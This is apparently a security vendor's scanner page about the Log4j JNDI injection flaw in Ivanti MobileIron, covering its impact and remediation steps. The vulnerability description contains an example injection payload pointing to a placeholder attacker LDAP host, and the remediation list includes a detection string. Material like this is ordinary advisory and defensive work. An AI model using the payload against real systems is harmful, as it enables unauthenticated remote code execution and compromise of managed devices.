S4E just found a high-severity finding from [ai] web application login panel detection scanner
PlatformPlansPartners
Resources
ToolsBlogDocs
Sign Up →
critical·Product Based Web Vulnerabilities·Updated Oct 8, 2024

Ivanti MobileIron Remote Code Execution Scanner

Detects RCE in Ivanti MobileIron by targeting Log4j JNDI injection in log messages, allowing unauthenticated remote code execution.

Est. Time~10 seconds
Scan TypeSingle Scan
Targetsurl
CostFree
2.7k
Times Used
continuous scan runs
3.4k
Continuously Checked
assets under CS
0
Vulnerabilities Found
confirmed findings
References
Detail

Ivanti MobileIron is a mobile device management (MDM) solution widely used in various organizations to manage and secure mobile data. It helps IT departments enforce policies, configure settings, and ensure compliance across multiple devices like smartphones and tablets. The software is pivotal in managing corporate devices remotely, enabling the secure transmission of corporate data. It is commonly utilized by companies that maintain a large fleet of mobile devices. MobileIron is known for its flexibility and support for a wide range of device types, making it an attractive choice for industries such as education, healthcare, and finance where data security is paramount. Its integration capabilities provide deep management control over both company-issued and BYOD devices.

This Remote Code Execution (RCE) vulnerability involves the exploitation of log message manipulation within the Apache Log4j2 library. The issue stems from JNDI features used in configuration, log messages, and parameters that do not properly neutralize attacker-controlled input. By manipulating these inputs, an attacker can use the JNDI lookup functionality to trigger execution of malicious code. This vulnerability is critical as it allows unauthenticated attackers to execute arbitrary commands on the server, compromising the entire MDM infrastructure.

Specifically, the vulnerability is present in the Log4j2 library used by Ivanti MobileIron. Attackers can send specially crafted requests to endpoints that log user-controlled data, such as HTTP headers or request parameters. The vulnerable function is the JNDI lookup in log messages, which processes strings like ${jndi:ldap://attacker.com/a} without proper sanitization. This allows an attacker to inject malicious LDAP or RMI URLs that, when resolved, download and execute arbitrary code on the MobileIron server.

If exploited, an attacker can gain full remote control over the Ivanti MobileIron server, leading to data breaches, lateral movement within the network, and potential compromise of all managed mobile devices. The impact is severe, as the MDM server holds sensitive corporate data and device management credentials. Organizations could face regulatory fines, reputational damage, and operational disruption. Immediate remediation is critical to prevent exploitation.

Solution Advice
  • Update Apache Log4j2 to version 2.16.0 or later to patch the JNDI vulnerability.
  • If immediate update is not possible, set the system property 'log4j2.formatMsgNoLookups' to 'true' to disable message lookup.
  • Apply the latest Ivanti MobileIron security patches provided by the vendor.
  • Restrict network access to the MobileIron server to trusted IPs only.
  • Implement Web Application Firewall (WAF) rules to block Log4j exploit patterns.
  • Monitor logs for suspicious JNDI lookup strings like '${jndi:' in HTTP requests.
  • Conduct a thorough security audit to ensure no backdoors or persistence mechanisms were installed.
  • Enable intrusion detection systems (IDS) to alert on Log4j exploitation attempts.

Get AI-powered remediation steps tailored to your asset.

Try AI Solutions →

Check your infrastructure.
Right now.

11,000+ scanners. Free to start. No credit card required.

Ivanti MobileIron RCE Scanner | S4E Free Check